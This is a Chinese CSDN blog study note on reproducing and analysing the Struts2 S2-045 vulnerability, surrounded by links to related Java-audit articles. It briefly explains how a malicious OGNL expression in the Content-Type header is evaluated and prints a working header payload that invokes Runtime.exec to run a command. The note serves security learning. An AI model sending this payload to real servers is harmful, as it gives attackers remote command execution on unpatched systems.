java审计3

最新推荐文章于 2024-03-11 10:59:58 发布
最新推荐文章于 2024-03-11 10:59:58 发布
阅读量1.7k 收藏
点赞数
分类专栏: 网络安全 文章标签: java 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/superprintf/article/details/122175882
版权

[漏洞学习]

复现分析:https://xz.aliyun.com/t/4662

s2环境S2-045本地复现与分析_Au-CSDN博客正波师傅nb

[分析]
request链比较长,适合debug单步调试学习。具体原因在content-type输入恶意的ongl表达式之后抛出异常,并将ongl表达式包含到了返回的错误信息中,达到命令执行的效果

payload:

Content-Type:  start_not_with_multipart_but_contains__multipart/form-data %{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec('calc')};

request调用链

request请求大部分都是在浅黄色的过滤器和绿色的拦截器中间流转。
请添加图片描述

请添加图片描述

小健健健
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 审计日志_审计日志的实现
weixin_35902481的博客
02-16 4133
切面的entity用来记录审计日志的内容.切面类用来实现记录升级日志的操作.这里还有一些辅助的类,比如枚举类,枚举出了所有的模块及名称.这些基本工作做好了以后,在需要使用审计日志的模块中,添加类似下面这样一段语句就可以了。以导入为例,我要为导入添加审计日志。先实例化一个审计日志AuditLog,然后执行相应的方法就可以了。我这里调用的是导入的import2DB,导入方法。由此可以推断:我在审计日志...
JAVA代码审计初探
crystal_shrimps的博客
08-31 440
写在前面 最近要做代码审计,事先预习了一下,整理了代码审计需要的基础知识和一些可简单审计的漏洞。 参考:JAVA安全编码与代码审计 JAVA常用架构 maven 根目录下有pom.xml MVC 大部分web项目都基于MVC开发,model(模型)+view(视图)+controller(控制器) dao层,service层,controller层(web),view层 controller 负...
java 审计功能_Java代码审计入门篇
weixin_26712065的博客
02-13 1053
本期斗哥带来Java代码审计的一些环境和工具准备。Java这个语言相对于PHP来说还是比较复杂的,所以一开始接触到Java源码审计的时候会遇到一些关于环境和配置上一些困难,本文记录斗哥在开始去审计Java代码的一些准备,希望能够帮助到刚入门的新手朋友们。0x00 Java环境说明1. 安装Java环境首先是要安装JAVA相应的JDK安装包和相应的环境变量的配置。安装完成后默认的安装目录:环境变量的...
Java代码审计
2301_76786857的博客
03-11 1674
Java 是一种跨平台的编程语言,具有良好的可移植性和灵活性,因此在各种应用领域得到了广泛应用。从企业级应用到移动应用,从 Web 应用到嵌入式系统,Java 都有着重要的地位。然而,由于 Java 的普及性和复杂性,其中的安全漏洞和代码缺陷也变得更加普遍。 Java 代码审计是对使用Java编写的软件代码进行全面检查和分析,通过白盒的方式发现其中的安全漏洞和潜在风险,代码审计已成为保护网络安全性的重要手段之一。
Java代码审计案例及修复
12-22
Java 代码审计案例及修复 Java 代码审计是指对 Java 源代码进行安全审查和评估,以发现潜在的安全漏洞和风险。Java 代码审计案例及修复旨在提供一个 Java 代码审计的实践指南,涵盖了 Java 代码审计的基本概念、...
JAVA代码审计
06-28
JAVA代码审计JAVA代码审计 图示JAVA代码审计 图示JAVA代码审计 图示JAVA代码审计 图示JAVA代码审计 图示
Java代码审计思维导图
最新发布
03-23
第一类:常见web漏洞,涵盖了SQL注入,XSS注入,链接注入,文件上传,反序列化,SSRF的漏洞成因,漏洞审计以及漏洞修复 第二类:业务逻辑漏洞,涵盖了逻辑漏洞,短信漏洞,验证码漏洞的漏洞成因,漏洞审计以及漏洞...
Java审计任职资格考试系统.zip
05-02
Java审计任职资格考试系统源码 Java审计任职资格考试系统源码 Java审计任职资格考试系统源码 Java审计任职资格考试系统源码 Java审计任职资格考试系统源码 Java审计任职资格考试系统源码 Java审计任职...
IAST安全扫描原理
superprintf的博客
01-05 5650
IAST:交互式应用程序安全测试(Interactive Application Security Testing),是黑盒测试(SAST),白盒测试(DAST)结合优点而成的灰盒测试 其交互性体现在agent和扫描器之间的交互,分为三类,1.主动型,2.被动型(流量型暂不考虑在内,因为未实现agent) 主动IAST agent使用java动态代理,在程序运行时修改字节码插入代码(即插庄)。 1.agent部署:agent会是一个jar文件,程序运行的时候设置代理为agent,比如运行java程序的时候
VMware虚拟机搭建渗透网络及原理解析
superprintf的博客
11-18 3845
这篇文章的写作顺序: 1.先熟悉VMware三种模式 本人是MacBook,如果你是windows电脑可以参考 https://blog.csdn.net/weixin_42442713/article/details/80903173 2.实验VMware三种模式 3.按照metasploit魔鬼训练营中的环境搭建网络(一个小公司网路模型) //# vmware网络配置的进阶请参照官网教程 //# https://docs.vmware.com/cn/VMware-Workstation-Pro/inde
java审计4
superprintf的博客
12-27 2131
[基础知识] 巩固一下:深入理解JNDI注入与Java反序列化漏洞利用 Java RMI codebase 小议 ldap [fastjson1.2.22下载] Download fastjson-1.2.22.jar file - Jar f 下载后新建工程,导入jar包 [漏洞学习] 1.Fastjson 1.2.22-1.2.24反序列化漏洞分析: https://xz.aliyun.com/t/8979 (漏洞复现要用1.8.0_102之前的jdk,JDK 8u113 之后,系统属性 com.sun
自学白帽子黑客第三年总结
superprintf的博客
11-14 1805
碎碎念
学习spf记录引发的问题(一)
superprintf的博客
02-22 1713
dns一系列学习
sqli-labs提示和答案(含详细教程)
superprintf的博客
10-02 1645
前四关登录成功显示用户名,报错正常 第一关id=‘1’ 第二关id=1 第三关id=(‘1’) 第四关id=(“1”) 第五关和六关登录成功不显示用户名,报错正常 第五关id=‘1’ 第六关id=“1” 第七关登录成功不显示用户名,报错固定为You have an error in your SQL syntax 第七关id=((‘1’)) 第八关登录成功不显示用户名,不报错 第八关id=‘1’ 第九关登录成功或者失败只显示You are in… ...
java审计1
superprintf的博客
12-27 1508
[基础部分] 反射: Java代码审计基础之反射 - FreeBuf网络安全行业门户 java反射机制学习 - Monitor’s Blog 反序列化: 详解 Java 中的序列化与反序列化 java对象的序列化以及反序列化详解 - 少说点话 - 博客园 [漏洞学习] Apache Commons Collections反序列化漏洞解析 反序列寻找构造链。链的开头是TransformedMap和InvokerTransformer这两个类。而链的结尾要逐渐推演替换到有相应readObject方法的类,这样才
数据库报错防护
superprintf的博客
01-13 1252
环境搭建 docker run -d -p 50000:50000 --name db2 --privileged=true -e DB2INST1_PASSWORD=123456 -e DBNAME=testdb -e LICENSE=accept ibmcom/db2 docker exec -it db2 bash su - db2inst1 db2 connect to testdb db2 "create table TEST(ID BIGINT NOT NULL GENERATED BY DE
SSRF归拢
superprintf的博客
02-05 1013
了解SSRF,这一篇就足够了 [WEB安全]SSRF中URL的伪协议
Java安全编程:防止SQL注入的代码审计
"本文主要探讨了Java安全编程中的一个重要话题——代码审计,特别是针对SQL注入漏洞的防范。文章通过两个漏洞示例解释了SQL注入攻击的本质和危害,并提供了相应的审计策略和修复方案。" 在Java编程中,确保代码安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值